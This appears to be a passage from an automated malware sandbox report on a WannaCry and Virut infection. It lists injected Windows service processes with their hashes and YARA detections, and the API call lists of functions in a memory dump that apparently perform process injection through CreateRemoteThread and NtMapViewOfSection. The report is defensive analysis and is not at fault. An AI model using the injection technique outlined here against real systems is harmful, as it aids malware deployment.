Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000011.00000002.2279994193.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:57:15
Start date:	15/01/2025
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff7751a0000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000012.00000002.2719447551.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000012.00000002.2777701008.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000012.00000000.1507806969.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	10:57:15
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000013.00000000.1513385761.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000013.00000002.2718078909.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000013.00000002.2718205451.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	10:57:16
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000014.00000002.2719092458.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000014.00000002.2718602569.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000014.00000000.1516012200.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	10:57:16
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000015.00000002.2719581126.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000015.00000002.2719011781.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000015.00000000.1517859323.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	10:57:16
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000002.2718267078.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000000.1520258438.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000002.2718209391.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	10:57:16
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000017.00000002.2719418097.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000017.00000002.2718893631.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000017.00000000.1522321273.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	10:57:17
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000002.2719553271.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000002.2720214040.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000000.1532350980.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	10:57:19
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000002.2720264639.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000002.2719630248.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000000.1545080050.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	10:57:19
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000002.2719776272.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000002.2720463440.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000000.1546866705.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	10:57:19
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000002.2718712243.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000000.1547825890.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000002.2718378800.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	10:57:19
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001C.00000000.1551989723.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001C.00000002.2718375782.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001C.00000002.2718656610.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	10:57:20
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001D.00000002.2718376405.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001D.00000000.1556664324.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001D.00000002.2718657929.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	10:57:20
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001E.00000002.2718396660.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001E.00000000.1562843216.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001E.00000002.2718865273.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	10:57:21
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001F.00000000.1563869827.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001F.00000002.2718374412.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001F.00000002.2718655372.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	10:57:21
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000020.00000000.1570640748.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000020.00000002.2718895917.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000020.00000002.2718502180.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	10:57:21
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000021.00000002.2718953458.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000021.00000000.1571774510.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000021.00000002.2718545796.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	34
Start time:	10:57:21
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000022.00000002.2719934656.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000022.00000002.2777490892.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000022.00000000.1573456651.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	10:57:22
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000002.2720636903.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000000.1579253830.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000023.00000002.2720028033.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	10:57:22
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000024.00000000.1583741288.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000024.00000002.2718548042.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000024.00000002.2718952875.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	37
Start time:	10:57:23
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000002.2718552816.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000000.1584365051.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000025.00000002.2719011282.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	10:57:23
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000000.1588780357.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000002.2719064286.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000000.1588816089.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000026.00000002.2718556376.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	10:57:23
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000027.00000002.2720101514.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000027.00000000.1588961193.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000027.00000002.2720745515.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	10:57:24
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000028.00000000.1594507271.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000028.00000002.2718554809.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000028.00000000.1594553743.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000028.00000002.2777706559.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	10:57:24
Start date:	15/01/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000029.00000002.2718553282.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000029.00000002.2719008114.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000029.00000000.1594740605.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	62.4%
Total number of Nodes:	655
Total number of Limit Nodes:	2

Executed Functions

Function 00AD042D Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 290
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00AD04BE
GetVersion.KERNEL32 ref: 00AD0500
VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 00AD0528
CloseHandle.KERNELBASE(?), ref: 00AD05AD

Strings

csrs, xrefs: 00AD082C
\BaseNamedObjects\tghtVt, xrefs: 00AD0709, 00AD072C, 00AD073A
\BaseNamedObjects\tghtVt, xrefs: 00AD0708

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Handle$AllocCloseModuleVersionVirtual
String ID: \BaseNamedObjects\tghtVt$\BaseNamedObjects\tghtVt$csrs
API String ID: 3017432202-2040488002
Opcode ID: 43ec0803d0a0dafcaea35956b0059ac1bcfa55dd341d92edebfb48273f019b49
Instruction ID: b5aeabb71c89872cbe4c14c37958b3109707f2f2f0b192b73994515e41f6a88b
Opcode Fuzzy Hash: 43ec0803d0a0dafcaea35956b0059ac1bcfa55dd341d92edebfb48273f019b49
Instruction Fuzzy Hash: 34B1AA71605249FFEB219F24C80AFAA3BA9EF45710F00402AFD0A9E281C7F09F55CB59

Function 00AD05F2 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193
stringnativeprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE(?), ref: 00AD05AD
GetModuleHandleA.KERNEL32(00AD05EC), ref: 00AD05F2
lstrcpyW.KERNEL32(\BaseNamedObjects\tghtVt,\BaseNamedObjects\tghtVt,?,?,?,?), ref: 00AD070A
lstrcpyW.KERNEL32(\BaseNamedObjects\tghtVt,?), ref: 00AD072D
lstrcatW.KERNEL32(\BaseNamedObjects\tghtVt,\tghtVt), ref: 00AD073B
NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 00AD076B
NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 00AD0786
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AD07C9
Process32First.KERNEL32 ref: 00AD07DC
Process32Next.KERNEL32 ref: 00AD07ED
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AD0805
CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00AD0842
CloseHandle.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AD085D
CloseHandle.KERNEL32 ref: 00AD086C

Strings

csrs, xrefs: 00AD082C
\BaseNamedObjects\tghtVt, xrefs: 00AD0709, 00AD072C, 00AD073A
\BaseNamedObjects\tghtVt, xrefs: 00AD0708

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
String ID: \BaseNamedObjects\tghtVt$\BaseNamedObjects\tghtVt$csrs
API String ID: 1545766225-2040488002
Opcode ID: a0a38d7378b868c1c70dcdbeac2eb480934ad4b5eff30f61bc7bace271459fa5
Instruction ID: ad180cbc28dfdbadd05de5d45660acd9b6e7a7d9aa2c13809fadb0ec4cb46e21
Opcode Fuzzy Hash: a0a38d7378b868c1c70dcdbeac2eb480934ad4b5eff30f61bc7bace271459fa5
Instruction Fuzzy Hash: C1719931604209FFEB219F10C84AFAE3B6DEF45310F14402AED0A9E291C7F5AF459B99

Function 00AD116F Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 354
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00AD1162,00AD0796,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00AD116F

Part of subcall function 00AD1196: GetProcAddress.KERNEL32(00000000,00AD1180), ref: 00AD1197

Strings

\tghtVt, xrefs: 00AD11C6

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: \tghtVt
API String ID: 2574300362-3562793120
Opcode ID: 154f1ee51cbe90f1fc3c60f854f0224f5056baf707f0f25976c895cea551aec1
Instruction ID: 18fbdafd9be5cd11e7b93339502ec3c983899d234666361ccd72f92aa1b1a540
Opcode Fuzzy Hash: 154f1ee51cbe90f1fc3c60f854f0224f5056baf707f0f25976c895cea551aec1
Instruction Fuzzy Hash: 77B17A2145CAD17BCB63CB3488899EABFB1EF63760718469FE4C34EA53D3619902C391

Function 00AD252F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenSection.NTDLL(?,0000000E), ref: 00AD255E

Strings

\BaseNamedObjects\tghtVt, xrefs: 00AD254B

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: OpenSection
